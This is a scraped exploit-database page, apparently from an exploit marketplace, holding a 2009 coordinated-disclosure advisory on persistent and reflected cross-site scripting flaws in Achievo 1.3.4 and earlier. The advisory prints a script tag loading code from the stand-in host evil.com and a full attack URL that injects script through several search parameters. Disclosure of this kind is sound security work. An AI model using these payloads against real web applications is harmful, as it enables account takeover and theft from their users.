0day.today - Ce-a mai mare baze de date de exploit-uri din lume.
![](/img/logo_green.jpg)
Folosim un singur domeniu DOMAIN_LINK
Dacă dorești să cumperi un exploit sau să platești pentru un serviciu, trebuie să cumperi Gold. Nu dormim să folosim site-ul pentru scopuri informatice negative (hacking), prin urmare orice tip de acțiune de hacking care poate afecta ilegal alți utilizatori sau pagini web la care nu ești proprietar va fi pedepsită cu blocarea contului permanentă incluzand distrugerea datelor tale care aparțin de cont.
Administrația acestui website folosește adresele oficiale de contact. Atenție la impostori!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Citiți [ acordul ]
- Citiți [ trimite ] reguli
- Vizitați [ Întrebări frecvente. ] pagină
- [ Înregistrare ] profil
- Obține [ GOLD ]
- Dacă dorești să [ vinzi ]
- Dacă dorești să [ cumperi ]
- Dacă ați pierdut [ cont-ul vizitați această pagină. ]
- Orice întrebări [ [email protected] ]
- Pagină de autorizare
- Pagină de Înregistrare
- Pagină de restaurare a unui cont
- Pagina FAQ
- Pagina de contact
- Regulamentul pentru post-uri
- Pagina de acorduri
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ne puteți contacta prin:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Achievo <= 1.3.4 xss
==================== Achievo <= 1.3.4 xss ==================== Multiple XSS in Achievo 1. *Advisory Information* Title: Multiple XSS in Achievo Vendors contacted: Achievo Release mode: Coordinated release 2. *Vulnerability Information* Class: Multiple Cross Site Scripting (XSS) Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2009-2733 3. *Software Description* Achievo is a flexible web-based resource management tool for business environments. Achievo's resource management capabilities will enable organizations to support their business processes in a simple, but effective manner [0]. 4. *Vulnerability Description* Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it. For additional information, please read [1]. 5. *Vulnerable packages* Version <= 1.3.4 6. *Non-vulnerable packages* Achievo developers informed us that all users should upgrade to the latest version of Achievo, which fixes this vulnerability. More information to be found here: http://www.achievo.org/ 7. *Technical Description* 7.1 A Persistent Cross Site Scripting vulnerability was found in the 'tittle' variable within the scheduler module. This is because the application does not properly sanitise the users input. The vulnerability can be triggered by a user submitting the following data within the scheduler title: <SCRIPT SRC=//evil.com/xss.js></SCRIPT> Which will include the xss.js javascript file within the schedule. A javascript that exploits this issue and creates a new administrator user in the system can be found in Bonsai's blog [2]. 7.2 A Reflected Cross Site Scripting vulnerability was found in the atksearch[contractnumber], atksearch_AE_customer[customer] and atksearchmode[contracttype] variables within the 'Organisation Contracts' administration page. This is because the application does not properly sanitise the users input. The vulnerability can be triggered by clicking on the following URL: http://www.example.com/dispatch.php?atkprevlevel=0&atkescape=&atknodetype=organization.contracts&atkaction=admin&atksmartsearch=clear&atkstartat=0&atksearch[contractnumber]="><script>alert('xss');</script>&atksearchmode[contractnumber]=substring&atksearch[contractname]="><script>alert('xss');</script>&atksearchmode[contractname]=substring&atksearch_AE_contracttype[contracttype][=&atksearchmode[contracttype]=exact&atksearch_AE_customer[customer]="><script>alert('xss');</script>&atksearchmode[customer]=substring 8. *Report Timeline* - 2009-07-09: Vulnerabilities were identified. - 2009-08-08: Vendor contacted. - 2009-08-12: Vendor confirmed vulnerabilities. - 2009-08-14: Vendor sets possible release date of fixed version to Monday 12 Oct. - 2009-10-12: Vendor released fixed version. # 0day.today [2024-07-04] #